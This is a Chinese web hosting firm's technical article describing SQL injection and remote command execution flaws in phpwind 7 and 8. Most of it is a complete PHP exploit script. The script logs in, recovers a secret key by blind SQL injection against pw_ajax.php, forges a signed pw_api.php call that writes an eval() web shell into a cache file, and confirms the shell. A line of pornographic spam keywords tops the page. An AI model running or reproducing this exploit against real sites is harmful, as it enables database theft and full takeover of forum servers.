亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

phpwind多個遠程代碼執行漏洞

添加時間:2011-2-1  添加: admin 

phpwind 7和8版本存在輸入驗證漏洞,攻擊者成功利用該漏洞可以遠程執行任意php代碼。

問題存在于pw_ajax.php中,由于用戶提交給fieldname參數的數據缺少充分的過濾,攻擊者可利用漏洞進行SQL注入攻擊獲取任何數據庫里的數據。

另外class_other.php中存在一個任意命令執行的漏洞,由于對$class[cid]輸入缺少充分過濾,不過進入此邏輯需要一些較為關鍵的key,借助上面的注射漏洞即可獲得該key。

PHPWind has a sql injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the “fieldname” Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

In addition Input passed to the “$class[cid]” Parameter in class_other.php is not properly sanitised before being used in a SQL query. But in order to reach this logic code need some important key, attacker could exploit above sql injection vulnerability to get key .

測試代碼


echo ”

Info: Poc for Phpwind遠程命令執行

Test: exploit.php user password http://www.blackxl.org/phpwind/

“;

if($argc<3){

echo “\r\n參數缺少\r\n”;

die();

}

$user=$argv[1];

$pass=$argv[2];

$pwurl=$argv[3];

$myheader=array(

‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,

‘Accept-Language: zh-cn,zh;q=0.5′,

‘Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7′,

‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8′,

‘Referer: http://www.blackxl.org‘,

‘Connection: Keep-Alive’,

‘Cache-Control: no-cache’,

‘User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)’

);

$cookie=”";

$str=curlsend(“$pwurl/login.php?”,”POST”,0,$myheader,”forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC”,1);

preg_match_all(“/Set-Cookie:([^;]+)/is”,$str,$array);

for($i=0;$i

$cookie=$cookie.”;”.$array[1][$i];

}

//echo $cookie;

$test = curlsend(‘$pwurl/pw_ajax.php’,”POST”,0,$myheader,”,1);

if(strpos($test,’’)) {

die(‘用戶密碼或者其他參數錯誤’);

}

$shellcode=”action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23″;

$hash=”0123456789abcdef”;

$craked=”";

for($i=0;$i<32;$i++){

for($n=0;$n<16;$n++){

$tmp=str_replace(“{offset}”,bin2hex($craked.$hash[$n]),$shellcode);

$tmp=curlsend(“$pwurl/pw_ajax.php”,”POST”,0,$myheader,$tmp,0);

if(strpos($tmp,”pw_config”)){

echo “CrackEd Offset “.($i+1).” :”.$hash[$n].”\r\n”;

$craked=$craked.$hash[$n];

break;

}

}

}

echo “Craked Magicdata :”.$craked.”\r\n”;

echo “Get shell :”;

//another 0day

$arg=”;

$hack = array();

$hack['mode'] = ‘Other’;

$hack['method'] = ‘threadscateGory’;

$hack['params'] = ‘a:1:{s:3:”cid”;a:1:{s:3:”cid”;a:1:{s:3:”cid”;s:21:”\’.eval($_GET[c]).\’abc”;}}}’;

$hack['type'] = ‘app’;

$hack = strips($hack);

ksort($hack);

reset($hack);

foreach ($hack as $key => $value) {

if ($value && $key != ‘sig’) {

$arg .= “$key=$value&”;

}

}

$arg.=’sig=’.md5($arg.$craked);

echo file_get_contents(“$pwurl/pw_api.php?”.$arg);

echo “OK\r\n”;

$str=file_get_contents(“$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;”);

if(strpos($str,’wooyun’)){

echo “Got shell :”.”$pwurl/data/bbscache/info_class.php?c=phpinfo();”;

echo “\r\nOver!”;

}

function strips($param) {

if (is_array($param)) {

foreach ($param as $key => $value) {

$param[$key] = strips($value);

}

} else {

$param = stripslashes($param);

}

return $param;

}

function curlsend($url,$method=false,$ssl=0,$myheader,$data=”,$header=0){

global $cookie;

$ch = curl_init();

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, CURLOPT_HEADER, $header);

if($ssl){

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

}

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

}

關健詞:phpwind,遠程代碼

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站